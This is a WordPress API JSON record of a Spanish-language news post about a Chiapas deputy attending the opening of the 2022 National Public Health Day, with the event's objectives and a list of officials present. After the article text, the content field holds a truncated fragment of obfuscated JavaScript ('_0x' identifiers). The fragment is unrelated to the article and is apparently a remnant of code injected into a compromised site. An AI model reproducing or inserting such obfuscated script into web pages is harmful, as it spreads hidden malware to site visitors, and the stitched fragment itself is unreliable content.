{"id":5793,"date":"2022-10-11T03:45:11","date_gmt":"2022-10-11T03:45:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5793"},"modified":"2022-10-11T03:45:12","modified_gmt":"2022-10-11T03:45:12","slug":"acciones-intensivas-e-integrales-de-promocion-prevencion-y-educacion-para-la-salud-alcazar-cordero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5793","title":{"rendered":"Acciones intensivas e integrales de promoci\u00f3n, prevenci\u00f3n y educaci\u00f3n para la salud: Alc\u00e1zar Cordero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221010-WA0028-1024x576.jpg\" alt=\"\" class=\"wp-image-5794\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221010-WA0028-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221010-WA0028-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221010-WA0028-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221010-WA0028.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Como presidenta de la comisi\u00f3n he constatado el trabajo y la inversi\u00f3n que el actual gobierno ha realizado en esta materia, recalc\u00f3 la legisladora.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 10 de octubre de 2022.- La diputada Ver\u00f3nica Alc\u00e1zar Cordero presidenta de la Comisi\u00f3n de Salubridad y Asistencia acompa\u00f1\u00f3 al gobernador del Estado Rutilio Escand\u00f3n Cadenas a la inauguraci\u00f3n de la Segunda Jornada Nacional de Salud P\u00fablica 2022 en la que participan diversas instancias del orden federal Estatal y municipal, con el prop\u00f3sito de acercar los servicios de salud a la poblaci\u00f3n.Lo anterior, dijo la legisladora, al realizar acciones intensivas e integrales de promoci\u00f3n, prevenci\u00f3n y educaci\u00f3n para la salud en especial atenci\u00f3n a grupos vulnerables a fin de promover mejores condiciones de salud y contribuir a mejorar su calidad de vida.Asimismo, reconoci\u00f3 el trabajo del Gobernador y del secretario de salud, Jos\u00e9 Manuel Cruz Castellanos resaltando la importancia que tiene la salud en la sociedad y que sin salud no hay nada. La Salud -reiter\u00f3- es un elemento indispensable para el crecimiento y desarrollo de los pueblos. \u201cSi estamos sanos somos m\u00e1s eficientes y m\u00e1s productivos y eso nos beneficia a todos.\u201cComo presidenta de la comisi\u00f3n he constatado el trabajo y la inversi\u00f3n que el actual gobierno ha realizado en esta materia\u201d, recalc\u00f3.Cabe destacar que La Jornada Nacional de Salud P\u00fablica, nace como una estrategia complementaria a los servicios de salud permanentes, acercando servicios de salud a la poblaci\u00f3n promoviendo una nueva cultura de la prevenci\u00f3n de forma integral, promoviendo la prevenci\u00f3n, promoci\u00f3n y educaci\u00f3n para la salud a lo largo de toda la l\u00ednea de vida.En esta Segunda Jornada Nacional de Salud P\u00fablica (JNSP) 2022, se contemplan acciones transversales de los programas de la Subsecretar\u00eda de Prevenci\u00f3n y Promoci\u00f3n de la Salud con actividades enfocadas a los principales problemas de salud p\u00fablica, descritas por cada programa de acci\u00f3n y por grupo de edad, implica la ejecuci\u00f3n de actividades simult\u00e1neas de salud p\u00fablica, que ameritan establecer sinergias entre los diferentes programas para hacer m\u00e1s eficaces las actividades.Objetivos Generales\u2022 Brindar a la poblaci\u00f3n acciones integrales de salud p\u00fablica acordes a la l\u00ednea de vida; \u2022 Acercar los servicios de salud a los diferentes grupos de poblaci\u00f3n, especialmente a los que se encuentran en situaci\u00f3n de vulnerabilidad; \u2022 Romper la cadena de transmisi\u00f3n de algunos padecimientos, mediante acciones integrales para la prevenci\u00f3n de enfermedades; \u2022 Incorporar la participaci\u00f3n de instituciones federales y estatales del sector salud, de organizaciones no gubernamentales, de gobiernos municipales y de otros sectores vinculados a la salud p\u00fablica.En el evento participaron la y los diputados: Elizabeth Escobedo Morales; Sandra Cecilia Herrera Dom\u00ednguez; Cuauht\u00e9moc Manuel Hern\u00e1ndez G\u00f3mez, Flor de Mar\u00eda Esponda Torres y Felipe Granda Pastrana. As\u00ed tambi\u00e9n, la Lic. Deliamar\u00eda Gonz\u00e1lez Flandez, Directora del Sistema DIF Chiapas; Dr. Ariosto Couti\u00f1o Ni\u00f1o, Comisionado de la Comisi\u00f3n Estatal de Conciliaci\u00f3n y Arbitraje M\u00e9dico del Estado de Chiapas: Dr. Manuel Cervantes Ocampo, Encargado del \u00d3rgano de Representaci\u00f3n Desconcentrada del Instituto Mexicano del Seguro Social (IMSS) en Chiapas; Dr. Carlos Dom\u00ednguez Maldonado, Subdelegado M\u00e9dico del Instituto de Seguridad y Servicios Sociales de los Trabajadores del Estado (ISSSTE); Dra. Mar\u00eda Jes\u00fas S\u00e1nchez; Asesora Internacional de Enfermedades Transmisibles de la OPS\/OMS.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Como presidenta de la comisi\u00f3n he constatado el trabajo y la inversi\u00f3n que el actual gobierno ha realizado en esta materia, recalc\u00f3 la legisladora. Tuxtla Guti\u00e9rrez, Chiapas a 10 de octubre de 2022.- La diputada Ver\u00f3nica Alc\u00e1zar Cordero presidenta de la Comisi\u00f3n de Salubridad y Asistencia acompa\u00f1\u00f3 al gobernador del Estado Rutilio Escand\u00f3n Cadenas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5794,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5793","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5793","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5793"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5793\/revisions"}],"predecessor-version":[{"id":5795,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5793\/revisions\/5795"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5794"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5793"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5793"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5793"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}